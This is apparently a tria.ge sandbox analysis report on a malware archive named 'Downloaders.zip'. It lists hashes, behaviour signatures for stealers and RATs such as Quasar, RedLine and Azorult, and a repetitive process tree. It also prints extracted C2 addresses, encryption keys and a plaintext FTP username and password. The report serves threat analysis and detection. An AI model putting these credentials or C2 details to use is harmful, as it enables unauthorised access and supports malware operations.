Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
27/02/2025, 06:33
250227-hbn4tszmx7 1026/02/2025, 23:57
250226-3zn4ysxwc1 1026/02/2025, 23:14
250226-271x2sxmz9 1014/02/2025, 01:10
250214-bjsnnayne1 1014/02/2025, 01:00
250214-bc5pmsymhw 1013/02/2025, 05:01
250213-fnkwtstpgw 1013/02/2025, 04:24
250213-e1kk6atmaz 1013/02/2025, 04:08
250213-eqe8patkgx 812/02/2025, 23:56
250212-3yzt3azrdx 10Analysis
-
max time kernel
1486s -
max time network
1488s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250211-en -
resource tags
-
submitted
12/02/2025, 23:56
General
-
Target
Downloaders.zip
-
Size
12KB
-
MD5
94fe78dc42e3403d06477f995770733c
-
SHA1
ea6ba4a14bab2a976d62ea7ddd4940ec90560586
-
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
-
SHA512
add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
-
SSDEEP
384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB
Score
10/10
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
ftpcluster.loopia.se - Port:
21 - Username:
srbreferee.com - Password:
luka2005
Extracted
Family
quasar
Version
1.3.0.0
Botnet
Office04
C2
20.107.53.25:25535
Mutex
QSR_MUTEX_zQ0poF2lHhCSZKSUZ3
Attributes
-
encryption_key
E2xbpJ93MnABcIqioTDL
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
Family
redline
C2
38.180.72.54:42814
Extracted
Family
quasar
Version
1.4.1
Botnet
Office04
C2
4.tcp.us-cal-1.ngrok.io:18092
14.243.221.170:2654
Mutex
11bbf22e-826e-486b-b024-adbd86228a9e
Attributes
-
encryption_key
7A589EDBC6A581E125BF830EF0D05FC74BB75E30
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
ctfmon
-
subdirectory
SubDir
Extracted
Family
quasar
Version
1.4.1
Botnet
Helper Atanka
C2
193.203.238.136:8080
Mutex
14f39659-ca5b-4af7-8045-bed3500c385f
Attributes
-
encryption_key
11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424
-
install_name
diskutil.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
diskutil
-
subdirectory
diskutil
Extracted
Family
redline
Botnet
duc
C2
159.223.34.114:1912
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
quasar
Version
1.4.0
Botnet
svhost
C2
151.177.61.79:4782
Mutex
a148a6d8-1253-4e62-bc5f-c0242dd62e69
Attributes
-
encryption_key
5BEC1A8BC6F8F695D1337C51454E0B7F3A4FE968
-
install_name
svhost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhost
-
subdirectory
svhost
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Detects Rhadamanthys payload 2 IoCs
-
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 5 IoCs
-
Njrat family
-
Quasar RAT 4 IoCs
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 10 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
-
Redline family
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
-
Stormkitty family
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
-
ZharkBot
ZharkBot is a botnet written C++.
-
Zharkbot family
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
-
Renames multiple (88) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 54 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file 28 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 58 IoCs
-
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 19 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 15 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 18 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 52 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 7 IoCs
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 9 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Program crash 14 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 64 IoCs
-
Modifies data under HKEY_USERS 12 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 48 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Modifies registry class
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
- Modifies Internet Explorer settings
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3244 -s 14483⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5620 -s 14883⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5724 -s 13763⤵
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1032 -s 14803⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5700 -s 14163⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3276 -s 9963⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3568 -s 14803⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3684 -s 14603⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
